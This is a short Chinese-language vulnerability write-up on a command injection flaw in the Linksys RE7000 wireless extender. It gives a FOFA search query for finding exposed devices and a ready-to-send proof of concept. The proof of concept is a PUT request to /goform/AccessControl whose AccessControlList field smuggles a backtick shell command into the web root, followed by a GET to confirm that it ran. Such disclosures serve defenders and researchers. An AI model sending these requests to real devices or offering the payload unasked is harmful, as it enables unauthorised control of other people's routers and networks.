0x01 产品简介

Linksys RE7000无线扩展器是一款功能强大、操作便捷的产品，旨在为用户提供无缝的网络覆盖和更快速、更稳定的网络连接体验。

0x02 漏洞概述

Linksys RE7000无线扩展器存在命令注入漏洞，未授权的攻击者可以通过该漏洞执行任意命令，控制服务器。

0x03 测绘语句

fofa: body="/login.shtml?ran="

0x04 漏洞复现

PUT /goform/AccessControl HTTP/1.1

Host:



{"AccessPolicy":"0","AccessControlList":"`echo 123>/etc_ro/lighttpd/RE7000_www/1.txt`"}

GET /1.txt HTTP/1.1